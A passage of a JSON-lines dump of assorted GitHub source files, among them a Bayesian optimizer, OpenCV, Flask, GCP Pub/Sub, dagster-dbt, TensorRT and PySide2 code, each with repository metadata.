conf):\n return {\n **conf,\n 'f': noop\n }\n\n def add_observation(self, ob):\n # ob: (x, y) while x is argument dict\n # _x:{'key1':v1,'key2':v2,.....}\n _x, y = ob\n # print('show ob_x, i.e, sampled_config_numeric:')\n # print(_x)\n # print('show ob.y, i.e, metric_result:')\n # print(y)\n # dict to tuple regarding keys in self.space\n x = []\n for k in self.space.keys():\n x.append(_x[k])\n# x=[conf1,conf2,...]\n # print(x,y)\n # add ob into bo space\n #\n # self.bo.space._Yview=[-240,-240,-121.41]\n try:\n print('bo space before add observation',self.bo.space)\n #space.add_observation(x, y) is define in the TargetSpace.py file\n self.bo.space.add_observation(x, y)\n except KeyError as e:\n # get exception message\n msg, = e.args\n raise Exception(msg)\n # print('show ob.space.X,only values no keys:')\n # print(self.bo.space.X)\n # print('show ob.space.Y:')\n # print(self.bo.space.Y)\n # XX=self.bo.space.X\n # YY=self.bo.space.Y\n # XX=self.xx\n # YY=self.yy\n\n # XX.append(self.bo.space.X)\n # YY.append(self.bo.space.Y)\n # print('XX and YY-----------')\n\n# todo operate in here!!\n# self.bo.gp.fit(XX,YY)\n\n\n def get_conf(self):\n acq = self.acq\n kappa = self.kappa\n xi = self.xi\n scaler=self.scaler\n # bo recalculates next best conf\n # codes below are adapted from implementation of bo.maximize\n\n # assert self.bo.space.Y is not None and len(\n # self.bo.space.Y) > 0, 'at least one observation is required before asking for next configuration'\n if self.bo.space.Y is None or len(self.bo.space.Y) == 0:\n x_max = self.bo.space.random_points(1)[0]\n else:\n\n print(' start find max')\n starttime = datetime.datetime.now()\n x_max = acq_max(\n ac=UtilityFunction(\n kind=acq,\n kappa=kappa,\n xi=xi,\n scaler=scaler\n ).utility,\n gp=self.bo.gp,\n scaler=self.scaler,\n y_max=self.bo.space.Y.max(),\n bounds=self.bo.space.bounds,\n random_state=self.bo.random_state,\n **self.bo._acqkw\n )\n\n print(' compelete find max')\n endtime = datetime.datetime.now()\n duringtime 
= endtime - starttime\n print(duringtime)\n\n # print('x_max=',x_max)\n # check if x_max repeats\n if x_max in self.bo.space:\n x_max = self.bo.space.random_points(1)[0]\n\n # print('show xmax from acqmax():')\n # print(x_max)\n return self._convert_to_dict(x_max)\n\n def _convert_to_dict(self, x_array):\n # print('show self.space, not self.bo.space, should be{'':()}:')\n # print(self.space)\n return dict(zip(self.space, x_array))\n\n\nclass ConfigedBayesianOptimizer(BayesianOptimizer):\n # Processing parameter space: Continuous and discrete\n def __init__(self, config, bo_conf={}):\n self._config = {**config}\n #print(self._config)\n bo_space = {}\n for k, v in self._config.items():\n v_range = v.get('range')\n if v_range: # discrete ranged parameter\n bo_space[k] = (0, len(v_range)) # note: right-close range\n else:\n bo_space[k] = (v['min'], v['max'])\n #print(bo_space)\n #print(bo_conf)\n super().__init__(bo_space, bo_conf)\n\n # get conf and convert to legal config\n def get_conf(self):\n sample = super().get_conf()\n print('show sample from father\\'s get_conf:')\n print(sample)\n # first is continuous value, second is translated\n return sample, self._translate(sample)\n\n def random_sample(self):\n result = {}\n for k, v in self._config.items():\n v_range = v.get('range')\n if v_range:\n result[k] = random() * len(v_range)\n else:\n minn, maxx = v.get('min'), v.get('max')\n result[k] = random() * (maxx - minn) + minn\n return result, self._translate(result)\n\n def _translate(self, sample):\n result = {}\n # orders in sample are the same as in _config dict\n # see: https://github.com/fmfn/BayesianOptimization/blob/d531dcab1d73729528afbffd9a9c47c067de5880/bayes_opt/target_space.py#L49\n # self.bounds = np.array(list(pbounds.values()), dtype=np.float)\n for sample_value, (k, v) in zip(sample.values(), self._config.items()):\n v_range = v.get('range')\n if v_range:\n try:\n index = int(sample_value)\n if index == len(v_range):\n index -= 1\n result[k] = v_range[index]\n except Exception as e:\n print('ERROR!')\n print(k, sample_value)\n print(v_range)\n raise e\n else:\n is_float = v.get('float', False)\n result[k] = sample_value if is_float else int(sample_value)\n #print(result)\n return result\n","repo_name":"wiluen/DeepCAT","sub_path":"test_kit/ultimate/lib/optimizer/bo.py","file_name":"bo.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72177412648","text":"#Trackbar find the specific Value HSV\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef callback(x):\r\n pass\r\n\r\ncv2.namedWindow('Input_Range')\r\n\r\nilowH = 0\r\nihighH = 360\r\n\r\nilowS = 0\r\nihighS = 255\r\n\r\nilowV = 0\r\nihighV = 255\r\n\r\n#create trackbars for color change\r\ncv2.createTrackbar('low_HUE','Input_Range',ilowH,360,callback)\r\ncv2.createTrackbar('high_HUE','Input_Range',ihighH,360,callback)\r\n\r\ncv2.createTrackbar('low_Saturate','Input_Range',ilowS,255,callback)\r\ncv2.createTrackbar('high_Saturate','Input_Range',ihighS,255,callback)\r\n\r\ncv2.createTrackbar('low_Intensity','Input_Range',ilowV,255,callback)\r\ncv2.createTrackbar('high_Intensity','Input_Range',ihighV,255,callback)\r\n\r\nfile_path = 'Board.jpg'\r\n\r\nwhile(1):\r\n cap = cv2.imread(file_path,1)\r\n \r\n #get Trackbar positions\r\n ilowH = cv2.getTrackbarPos('low_HUE','Input_Range')\r\n ihighH = cv2.getTrackbarPos('high_HUE','Input_Range')\r\n ilowS = cv2.getTrackbarPos('low_Saturate','Input_Range')\r\n ihighS = cv2.getTrackbarPos('high_Saturate','Input_Range')\r\n ilowV = cv2.getTrackbarPos('low_Intensity','Input_Range')\r\n ihighV = cv2.getTrackbarPos('high_Intensity','Input_Range')\r\n \r\n hsv = cv2.cvtColor(cap, cv2.COLOR_BGR2HSV)\r\n cv2.imshow('RGB',cap)\r\n lower_hsv = np.array([ilowH,ilowS,ilowV])\r\n higher_hsv = np.array([ihighH,ihighS,ihighV])\r\n mask = cv2.inRange(hsv,lower_hsv,higher_hsv)\r\n #cv2.imshow('mask',mask)\r\n \r\n cap = cv2.bitwise_and(cap,cap,mask=mask)\r\n \r\n #show Thresholded image\r\n cv2.imshow('cap',cap)\r\n \r\n #print(ilowH,ilowS,ilowV)\r\n if(cv2.waitKey(1) & 0xFF == ord('q')):\r\n break\r\ncv2.destroyAllWindows()\r\n","repo_name":"ema2541/WDProject_RobotArm","sub_path":"02_find_upper_lower_color.py","file_name":"02_find_upper_lower_color.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"74479463529","text":"import numpy as np\nimport random\n\nclass MyBattlesnakeHeuristics:\n '''\n The BattlesnakeHeuristics class allows you to define handcrafted rules of the snake.\n '''\n FOOD_INDEX = 0\n def __init__(self):\n pass\n \n def go_to_food_if_close(self, state, json):\n '''\n Example heuristic to move towards food if it's close to you.\n '''\n # Get the position of the snake head\n your_snake_body = json[\"you\"][\"body\"]\n i, j = your_snake_body[0][\"y\"], your_snake_body[0][\"x\"]\n \n # Set food_direction towards food\n food = state[:, :, self.FOOD_INDEX]\n \n # Note that there is a -1 border around state so i = i + 1, j = j + 1\n if -1 in state:\n i, j = i+1, j+1\n \n food_direction = None\n if food[i-1, j] == 1:\n food_direction = 0 # up\n if food[i+1, j] == 1:\n food_direction = 1 # down\n if food[i, j-1] == 1:\n food_direction = 2 # left\n if food[i, j+1] == 1:\n food_direction = 3 # right\n return food_direction\n \n def run(self, state, snake_id, turn_count, health, json, action):\n '''\n The main function of the heuristics.\n \n Parameters:\n -----------\n `state`: np.array of size (map_size[0]+2, map_size[1]+2, 1+number_of_snakes)\n Provides the current observation of the gym.\n Your target snake is state[:, :, snake_id+1]\n \n `snake_id`: int\n Indicates the id where id \\in [0...number_of_snakes]\n \n `turn_count`: int\n Indicates the number of elapsed turns\n \n `health`: dict\n Indicates the health of all snakes in the form of {int: snake_id: int:health}\n \n `json`: dict\n Provides the same information as above, in the same format as the battlesnake engine.\n\n `action`: np.array of size 4\n The qvalues of the actions calculated. The 4 values correspond to [up, down, left, right]\n '''\n log_string = \"\"\n # The default `best_action` to take is the one that provides has the largest Q value.\n # If you think of something else, you can edit how `best_action` is calculated\n best_action = int(np.argmax(action))\n \n # Example heuristics to eat food that you are close to.\n if health[snake_id] < 30:\n food_direction = self.go_to_food_if_close(state, json)\n if food_direction:\n best_action = food_direction\n log_string = \"Went to food if close.\"\n \n\n # TO DO, add your own heuristics\n \n assert best_action in [0, 1, 2, 3], \"{} is not a valid action.\".format(best_action)\n return best_action, log_string","repo_name":"awslabs/sagemaker-battlesnake-ai","sub_path":"source/MXNetEnv/inference/inference_src/battlesnake_heuristics.py","file_name":"battlesnake_heuristics.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"53"}
+{"seq_id":"28447897329","text":"import datetime\n\nfrom flask import (Blueprint, redirect, url_for, current_app,\n request, flash, render_template)\n\nfrom web.extensions import db\nfrom web.utils.helpers import (randomizer)\nfrom web.utils.helpers import (render_markup)\nfrom web.index.models import (posts, technologies, solutions, Randomizer)\n\nindex = Blueprint(\"index\", __name__)\n\n@index.route('/')\ndef _index():\n conf = {\n 'title' : 'Search Engine',\n 'slogan': 'Not Google.',\n\n 'sidebar': True,\n 'footer': True,\n 'rand': randomizer(),\n 'user_level': 2,\n }\n\n markup = render_markup(\"\"\"\n# Chapter #\n\n## Section ##\n\n* Item 1\n* Item 2\n \"\"\")\n\n return render_template('index/index.html', \n conf = conf,\n solutions = solutions,\n technologies = technologies,\n posts = posts,\n m = markup,\n c = request.headers.get('CF-IPCountry'))\n\n@index.route('/plans')\ndef plans():\n conf = {\n 'title' : 'web',\n 'slogan': 'The defining IT solution.',\n\n 'sidebar': False,\n 'footer': False,\n 'rand': None,\n 'user_level': 5,\n }\n\n return render_template('index/plans.html', conf=conf)\n\n@index.route('/spider')\ndef spider():\n conf = {\n 'title' : 'web',\n 'slogan': 'The defining IT solution.',\n\n 'sidebar': False,\n 'footer': False,\n 'rand': None,\n 'user_level': 5,\n }\n\n return render_template('index/spider.html', conf=conf)","repo_name":"hoytnix/spidey","sub_path":"httpd/web/index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3272235643","text":"import base64\nfrom operator import sub\nfrom google.cloud import firestore\nfrom google.cloud import pubsub_v1\nimport json\n\n# Declare the project ID\nproject_id = \"niyoproject-306620\"\n\n# Connect to Firestore DB (Native Mode)\ndb = firestore.Client(project=project_id)\n# Set active collection to user\nreaders = db.collection(u'readers')\n\n# Initiate Publisher and Subscriber for PubSub\npublisher = pubsub_v1.PublisherClient()\nsubscriber = pubsub_v1.SubscriberClient()\nsubscriber_web = pubsub_v1.SubscriberClient()\n\ndef register_device(reader_id):\n # First, create an entry on Firestore\n data = {\n u'action': u'none',\n u'amount': 0\n }\n readers.document(reader_id).set(data)\n\n # Then, create a topic in PubSub with the reader_id\n topic_id = reader_id\n topic_path = publisher.topic_path(project_id, topic_id)\n if topic_path not in [topic.name for topic in publisher.list_topics(request = {'project': f'projects/{project_id}'})]:\n topic = publisher.create_topic(request={\"name\": topic_path})\n print(f'Topic {topic_path} created successfully!')\n subscription_path = subscriber.subscription_path(project_id, topic_id)\n subscription_path_web = subscriber_web.subscription_path(project_id, topic_id + \"_web\")\n if subscription_path not in [subs for subs in publisher.list_topic_subscriptions(request = {'topic': topic_path})]:\n with subscriber:\n subscription = subscriber.create_subscription(\n request = {'name': subscription_path, 'topic': topic_path, 'enable_exactly_once_delivery': True}\n )\n print(f'Subscription {subscription_path} created successfully!')\n with subscriber_web:\n subscription_web = subscriber_web.create_subscription(\n request = {'name': subscription_path_web, 'topic': topic_path, 'enable_exactly_once_delivery': True}\n )\n print(f'Subscription {subscription_path_web} created successfully!')\n else:\n print(f'Subscription {subscription_path} or {subscription_path_web} already exists, skipping!')\n else:\n print(f'Topic {topic_path} already exists, skipping!')\n \n\n\n\ndef main(event, context):\n \"\"\"Triggered from a message on a Cloud Pub/Sub topic.\n Args:\n event (dict): Event payload.\n context (google.cloud.functions.Context): Metadata for the event.\n \"\"\"\n pubsub_message = base64.b64decode(event['data']).decode('utf-8')\n data = json.loads(pubsub_message)\n\n print(\"Reader ID:\" + str(data[\"reader_id\"]))\n\n register_device(data[\"reader_id\"])\n","repo_name":"xprilion/KolPay","sub_path":"cloud_functions/register-device.py","file_name":"register-device.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"}
+{"seq_id":"9892371367","text":"import warnings\nfrom abc import ABC\nfrom typing import Any, Mapping, Optional, Sequence\n\nfrom dagster import (\n DagsterInvariantViolationError,\n Failure,\n MetadataValue,\n _check as check,\n)\n\n\nclass DagsterDbtError(Failure, ABC):\n \"\"\"The base exception of the ``dagster-dbt`` library.\"\"\"\n\n\nclass DagsterDbtCliUnexpectedOutputError(DagsterDbtError):\n \"\"\"Represents an error when parsing the output of a dbt CLI command.\"\"\"\n\n invalid_line_nos: Sequence[int]\n\n def __init__(self, invalid_line_nos: Sequence[int]):\n check.sequence_param(invalid_line_nos, \"invalid_line_nos\", int)\n line_nos_str = \", \".join(map(str, invalid_line_nos))\n description = f\"dbt CLI emitted unexpected output on lines {line_nos_str}\"\n metadata = {\n \"Invalid CLI Output Line Numbers\": MetadataValue.json({\"line_nos\": invalid_line_nos})\n }\n super().__init__(description, metadata=metadata)\n self.invalid_line_nos = invalid_line_nos\n\n\nclass DagsterDbtCliRuntimeError(DagsterDbtError, ABC):\n \"\"\"Represents an error while executing a dbt CLI command.\"\"\"\n\n def __init__(\n self,\n description: str,\n logs: Optional[Sequence[Mapping[str, Any]]] = None,\n raw_output: Optional[str] = None,\n messages: Optional[Sequence[str]] = None,\n ):\n if logs is not None:\n warnings.warn(\n \"`logs` is a deprecated argument to DagsterDbtCliRuntimeError and will be discarded\"\n )\n if raw_output is not None:\n warnings.warn(\n \"`raw_output` is a deprecated argument to DagsterDbtCliRuntimeError and will be\"\n \" discarded\"\n )\n metadata = {\"Parsed CLI Messages\": \"\\n\".join(messages or [])}\n super().__init__(description, metadata=metadata)\n\n\nclass DagsterDbtCliHandledRuntimeError(DagsterDbtCliRuntimeError):\n \"\"\"Represents a model error reported by the dbt CLI at runtime (return code 1).\"\"\"\n\n def __init__(\n self,\n logs: Optional[Sequence[Mapping[str, Any]]] = None,\n raw_output: Optional[str] = None,\n messages: Optional[Sequence[str]] = None,\n ):\n super().__init__(\"Handled error in the dbt CLI (return code 1)\", logs, raw_output, messages)\n\n\nclass DagsterDbtCliFatalRuntimeError(DagsterDbtCliRuntimeError):\n \"\"\"Represents a fatal error in the dbt CLI (return code 2).\"\"\"\n\n def __init__(\n self,\n logs: Optional[Sequence[Mapping[str, Any]]] = None,\n raw_output: Optional[str] = None,\n messages: Optional[Sequence[str]] = None,\n ):\n super().__init__(\n \"Fatal error in the dbt CLI (return code 2): \" + \" \".join(messages or []),\n logs,\n raw_output,\n messages,\n )\n\n\nclass DagsterDbtCliOutputsNotFoundError(DagsterDbtError):\n \"\"\"Represents a problem in finding the ``target/run_results.json`` artifact when executing a dbt\n CLI command.\n\n For more details on ``target/run_results.json``, see\n https://docs.getdbt.com/reference/dbt-artifacts#run_resultsjson.\n \"\"\"\n\n def __init__(self, path: str):\n super().__init__(f\"Expected to find file at path {path}\")\n\n\nclass DagsterDbtCloudJobInvariantViolationError(DagsterDbtError, DagsterInvariantViolationError):\n \"\"\"Represents an error when a dbt Cloud job is not supported by the ``dagster-dbt`` library.\"\"\"\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-dbt/dagster_dbt/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"}
+{"seq_id":"20612446391","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport sys\nimport traceback\n\ntry:\n import tensorrt as trt # noqa pylint: disable=W0611 pylint: disable=W0611\n # Get TensorRT version number.\n [NV_TENSORRT_MAJOR, NV_TENSORRT_MINOR, NV_TENSORRT_PATCH, _] = [\n int(item) for item\n in trt.__version__.split(\".\")\n ]\n trt_available = True\nexcept Exception as e:\n logger = logging.getLogger(__name__)\n logger.warning(\n \"Failed to import TensorRT package, exporting TLT to a TensorRT engine \"\n \"will not be available.\"\n )\n trt_available = False\n\n\n# Default TensorRT parameters.\nDEFAULT_MAX_WORKSPACE_SIZE = 2 * (1 << 30)\nDEFAULT_MAX_BATCH_SIZE = 1\n\n\n# Define logger.\nlogger = logging.getLogger(__name__)\n\n\ndef _create_tensorrt_logger(verbose=False):\n \"\"\"Create a TensorRT logger.\n\n Args:\n verbose(bool): Flag to set logger as verbose or not.\n Return:\n tensorrt_logger(trt.infer.ConsoleLogger): TensorRT console logger object.\n \"\"\"\n if str(os.getenv('SUPPRES_VERBOSE_LOGGING', '0')) == '1':\n # Do not print any warnings in TLT docker\n trt_verbosity = trt.Logger.Severity.ERROR\n elif verbose:\n trt_verbosity = trt.Logger.INFO\n else:\n trt_verbosity = trt.Logger.WARNING\n tensorrt_logger = trt.Logger(trt_verbosity)\n return tensorrt_logger\n\n\ndef _set_excluded_layer_precision(network, fp32_layer_names, fp16_layer_names):\n \"\"\"When generating an INT8 model, it sets excluded layers' precision as fp32 or fp16.\n\n In detail, this function is only used when generating INT8 TensorRT models. It accepts\n two lists of layer names: (1). for the layers in fp32_layer_names, their precision will\n be set as fp32; (2). for those in fp16_layer_names, their precision will be set as fp16.\n\n Args:\n network: TensorRT network object.\n fp32_layer_names (list): List of layer names. These layers use fp32.\n fp16_layer_names (list): List of layer names. These layers use fp16.\n \"\"\"\n is_mixed_precision = False\n use_fp16_mode = False\n\n for i, layer in enumerate(network):\n if any(s in layer.name for s in fp32_layer_names):\n is_mixed_precision = True\n layer.precision = trt.float32\n layer.set_output_type(0, trt.float32)\n logger.info(\"fp32 index: %d; name: %s\", i, layer.name)\n elif any(s in layer.name for s in fp16_layer_names):\n is_mixed_precision = True\n use_fp16_mode = True\n layer.precision = trt.float16\n layer.set_output_type(0, trt.float16)\n logger.info(\"fp16 index: %d; name: %s\", i, layer.name)\n else:\n layer.precision = trt.int8\n layer.set_output_type(0, trt.int8)\n\n return is_mixed_precision, use_fp16_mode\n\n\nclass EngineBuilder(object):\n \"\"\"Create a TensorRT engine.\n\n Args:\n filename (list): List of filenames to load model from.\n max_batch_size (int): Maximum batch size.\n vmax_workspace_size (int): Maximum workspace size.\n dtype (str): data type ('fp32', 'fp16' or 'int8').\n calibrator (:any:`Calibrator`): Calibrator to use for INT8 optimization.\n fp32_layer_names (list): List of layer names. These layers use fp32.\n fp16_layer_names (list): List of layer names. 
These layers use fp16.\n verbose (bool): Whether to turn on verbose mode.\n tensor_scale_dict (dict): Dictionary mapping names to tensor scaling factors.\n strict_type(bool): Whether or not to apply strict_type_constraints for INT8 mode.\n \"\"\"\n\n def __init__(\n self,\n filenames,\n max_batch_size=DEFAULT_MAX_BATCH_SIZE,\n max_workspace_size=DEFAULT_MAX_WORKSPACE_SIZE,\n dtype=\"fp32\",\n calibrator=None,\n fp32_layer_names=None,\n fp16_layer_names=None,\n verbose=False,\n tensor_scale_dict=None,\n strict_type=False,\n ):\n \"\"\"Initialization routine.\"\"\"\n if dtype == \"int8\":\n self._dtype = trt.DataType.INT8\n elif dtype == \"fp16\":\n self._dtype = trt.DataType.HALF\n elif dtype == \"fp32\":\n self._dtype = trt.DataType.FLOAT\n else:\n raise ValueError(\"Unsupported data type: %s\" % dtype)\n self._strict_type = strict_type\n if fp32_layer_names is None:\n fp32_layer_names = []\n elif dtype != \"int8\":\n raise ValueError(\n \"FP32 layer precision could be set only when dtype is INT8\"\n )\n\n if fp16_layer_names is None:\n fp16_layer_names = []\n elif dtype != \"int8\":\n raise ValueError(\n \"FP16 layer precision could be set only when dtype is INT8\"\n )\n\n self._fp32_layer_names = fp32_layer_names\n self._fp16_layer_names = fp16_layer_names\n\n self._tensorrt_logger = _create_tensorrt_logger(verbose)\n builder = trt.Builder(self._tensorrt_logger)\n config = builder.create_builder_config()\n trt.init_libnvinfer_plugins(self._tensorrt_logger, \"\")\n if self._dtype == trt.DataType.HALF and not builder.platform_has_fast_fp16:\n logger.error(\"Specified FP16 but not supported on platform.\")\n raise AttributeError(\n \"Specified FP16 but not supported on platform.\")\n return\n\n if self._dtype == trt.DataType.INT8 and not builder.platform_has_fast_int8:\n logger.error(\"Specified INT8 but not supported on platform.\")\n raise AttributeError(\n \"Specified INT8 but not supported on platform.\")\n return\n\n if self._dtype == trt.DataType.INT8:\n if tensor_scale_dict is None and calibrator is None:\n logger.error(\"Specified INT8 but neither calibrator \"\n \"nor tensor_scale_dict is provided.\")\n raise AttributeError(\"Specified INT8 but no calibrator \"\n \"or tensor_scale_dict is provided.\")\n\n network = builder.create_network()\n\n self._load_from_files(filenames, network)\n\n builder.max_batch_size = max_batch_size\n config.max_workspace_size = max_workspace_size\n\n if self._dtype == trt.DataType.HALF:\n config.set_flag(trt.BuilderFlag.FP16)\n\n if self._dtype == trt.DataType.INT8:\n config.set_flag(trt.BuilderFlag.INT8)\n if tensor_scale_dict is None:\n config.int8_calibrator = calibrator\n # When use mixed precision, for TensorRT builder:\n # strict_type_constraints needs to be True;\n # fp16_mode needs to be True if any layer uses fp16 precision.\n set_strict_types, set_fp16_mode = \\\n _set_excluded_layer_precision(\n network=network,\n fp32_layer_names=self._fp32_layer_names,\n fp16_layer_names=self._fp16_layer_names,\n )\n if set_strict_types:\n config.set_flag(trt.BuilderFlag.STRICT_TYPES)\n if set_fp16_mode:\n config.set_flag(trt.BuilderFlag.FP16)\n else:\n # Discrete Volta GPUs don't have int8 tensor cores. So TensorRT might\n # not pick int8 implementation over fp16 or even fp32 for V100\n # GPUs found on data centers (e.g., AVDC). This will be a discrepancy\n # compared to Turing GPUs including d-GPU of DDPX and also Xavier i-GPU\n # both of which have int8 accelerators. 
We set the builder to strict\n # mode to avoid picking higher precision implementation even if they are\n # faster.\n if self._strict_type:\n config.set_flag(trt.BuilderFlag.STRICT_TYPES)\n else:\n config.set_flag(trt.BuilderFlag.FP16)\n self._set_tensor_dynamic_ranges(\n network=network, tensor_scale_dict=tensor_scale_dict\n )\n\n engine = builder.build_engine(network, config)\n\n try:\n assert engine\n except AssertionError:\n logger.error(\"Failed to create engine\")\n _, _, tb = sys.exc_info()\n traceback.print_tb(tb) # Fixed format\n tb_info = traceback.extract_tb(tb)\n _, line, _, text = tb_info[-1]\n raise AssertionError(\n \"Parsing failed on line {} in statement {}\".format(\n line, text)\n )\n\n self._engine = engine\n\n def _load_from_files(self, filenames, network):\n \"\"\"Load an engine from files.\"\"\"\n raise NotImplementedError()\n\n @staticmethod\n def _set_tensor_dynamic_ranges(network, tensor_scale_dict):\n \"\"\"Set the scaling factors obtained from quantization-aware training.\n\n Args:\n network: TensorRT network object.\n tensor_scale_dict (dict): Dictionary mapping names to tensor scaling factors.\n \"\"\"\n tensors_found = []\n for idx in range(network.num_inputs):\n input_tensor = network.get_input(idx)\n if input_tensor.name in tensor_scale_dict:\n tensors_found.append(input_tensor.name)\n cal_scale = tensor_scale_dict[input_tensor.name]\n input_tensor.dynamic_range = (-cal_scale, cal_scale)\n\n for layer in network:\n found_all_outputs = True\n for idx in range(layer.num_outputs):\n output_tensor = layer.get_output(idx)\n if output_tensor.name in tensor_scale_dict:\n tensors_found.append(output_tensor.name)\n cal_scale = tensor_scale_dict[output_tensor.name]\n output_tensor.dynamic_range = (-cal_scale, cal_scale)\n else:\n found_all_outputs = False\n if found_all_outputs:\n layer.precision = trt.int8\n tensors_in_dict = tensor_scale_dict.keys()\n assert set(tensors_in_dict) == set(tensors_found), (\n \"Some of the tensor names specified in tensor \"\n \"scale dictionary was not found in the network.\"\n )\n\n def get_engine(self):\n \"\"\"Return the engine that was built by the instance.\"\"\"\n return self._engine\n\n\nclass UFFEngineBuilder(EngineBuilder):\n \"\"\"Create a TensorRT engine from a UFF file.\n\n Args:\n filename (str): UFF file to create engine from.\n input_node_name (str): Name of the input node.\n input_dims (list): Dimensions of the input tensor.\n output_node_names (list): Names of the output nodes.\n \"\"\"\n\n def __init__(\n self,\n filename,\n input_node_name,\n input_dims,\n output_node_names,\n *args,\n **kwargs\n ):\n \"\"\"Init routine.\"\"\"\n self._input_node_name = input_node_name\n if not isinstance(output_node_names, list):\n output_node_names = [output_node_names]\n self._output_node_names = output_node_names\n self._input_dims = input_dims\n\n super(UFFEngineBuilder, self).__init__([filename], *args, **kwargs)\n\n def _load_from_files(self, filenames, network):\n filename = filenames[0]\n parser = trt.UffParser()\n for key, value in self._input_dims.items():\n parser.register_input(key, value, trt.UffInputOrder(0))\n for name in self._output_node_names:\n parser.register_output(name)\n try:\n assert parser.parse(filename, network, trt.DataType.FLOAT)\n except AssertionError:\n logger.error(\"Failed to parse UFF File\")\n _, _, tb = sys.exc_info()\n traceback.print_tb(tb) # Fixed format\n tb_info = traceback.extract_tb(tb)\n _, line, _, text = tb_info[-1]\n raise AssertionError(\n \"UFF parsing failed on line {} in statement 
{}\".format(line, text)\n )\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/common/export/trt_utils.py","file_name":"trt_utils.py","file_ext":"py","file_size_in_byte":12144,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"22023386358","text":"#consola del servidor (archivo de control)\n#este archivo forma parte de la estructura del servidor\n#este archivo sirve para el manejo del servidor durante la ejecucion\n\nimport sys\nimport os\n\n\n#lista de comandos\n#estos comandos no se ejecutan a la vez que el archivo del servidor\n\nrun = 'python main.py'\nlogs = 'cat logs.txt'\nhelp = 'help'\nclear = 'clear'\nmaintenance = 'python maintenance.py'\n\n \ncommands = ['run', 'logs','help', 'clear', 'maintenance']\n\nprint('Consola del servidor iniciada')\nwhile True:\n command = str(input())\n\n if command == 'run':\n \n print('')\n os.system(run)\n \n elif command == 'logs':\n \n print('')\n os.system(logs)\n \n elif command == 'help':\n \n for i in range(0, len(commands)):\n print('')\n print(commands[i])\n print('')\n \n elif command == 'clear':\n \n print('')\n os.system(clear)\n print('')\n \n elif command == 'maintenance':\n \n print('')\n #maintenance commands\n print('Lista de comandos del sistema de mantenimiento:')\n print('')\n print('-users --> Grafica del numero de usuarios')\n print('')\n \n command = str(input())\n if command == 'users':\n from maintenance import num_users\n else : \n print('Comando no valido') \n \n","repo_name":"Pachec00/Server","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"8844199457","text":"\nimport math\ndef find_substring(str, pattern):\n\tunique_pattern_chars = set(pattern)\n\tfrequency_dict = {}\n\twindow_start, min_length, dict_keys, m = 0, math.inf, 0, 0\n\n\tfor window_end in range(len(str)):\n\t\tright_char = str[window_end]\n\n\t\tif right_char in unique_pattern_chars:\n\t\t\tif right_char not in frequency_dict:\n\t\t\t\tfrequency_dict[right_char] = 0\n\t\t\t\tdict_keys += 1\n\n\t\t\tfrequency_dict[right_char] += 1\n\t\t\n\t\twhile dict_keys == len(unique_pattern_chars):\n\t\t\tmin_length = min(min_length, window_end - window_start + 1)\n\n\t\t\tleft_char = str[window_start]\n\t\t\tif left_char in unique_pattern_chars:\n\t\t\t\tfrequency_dict[left_char] -= 1\n\t\t\t\tif frequency_dict[left_char] == 0:\n\t\t\t\t\tdict_keys -= 1\n\t\t\t# else:\n\t\t\twindow_start += 1\n\n\tif min_length != math.inf:\n\t\tm = window_end - window_start + 1\n\t\treturn m\n\telse:\n\t\treturn 0\n\n\ndef main():\n\tprint(find_substring(\"aabdec\", \"abc\"))\n\tprint(find_substring(\"abdabca\", \"abc\"))\n\tprint(find_substring(\"adcad\", \"abc\"))\n\nmain()","repo_name":"Rama189/Grokking-the-Coding-Interview-Patterns","sub_path":"1. Sliding window/Problem Challenge 3 - Smallest Window containing Substring (hard).py","file_name":"Problem Challenge 3 - Smallest Window containing Substring (hard).py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26747047883","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport sys\nfrom PySide2.QtWidgets import (\n QApplication,\n QWidget,\n QPushButton,\n QHBoxLayout,\n QVBoxLayout,\n QListWidget,\n QAbstractItemView,\n)\n\n\nclass MainWindow(QWidget):\n def __init__(self, trp):\n super().__init__()\n self.setWindowTitle(\"Task 1\")\n self.setGeometry(370, 390, 370, 390)\n self.lst1 = QListWidget()\n self.lst1.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.lst2 = QListWidget()\n self.lst2.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.lst1.addItems(trp)\n self.inp1 = QPushButton(\"Add\")\n self.inp2 = QPushButton(\"Remove\")\n self.setting()\n\n def setting(self):\n hbox = QHBoxLayout()\n vbox = QVBoxLayout()\n hbox.addWidget(self.lst1)\n hbox.addLayout(vbox)\n vbox.addWidget(self.inp1)\n vbox.addWidget(self.inp2)\n hbox.addWidget(self.lst2)\n self.setLayout(hbox)\n self.inp1.clicked.connect(self.toright)\n self.inp2.clicked.connect(self.toleft)\n self.inp1.setStyleSheet(\"background: purple\")\n self.inp2.setStyleSheet(\"background: blue\")\n\n def toright(self):\n listItems = self.lst1.selectedItems()\n for item in listItems:\n self.lst1.takeItem(self.lst1.row(item))\n self.lst2.addItem(item)\n\n def toleft(self):\n listItems = 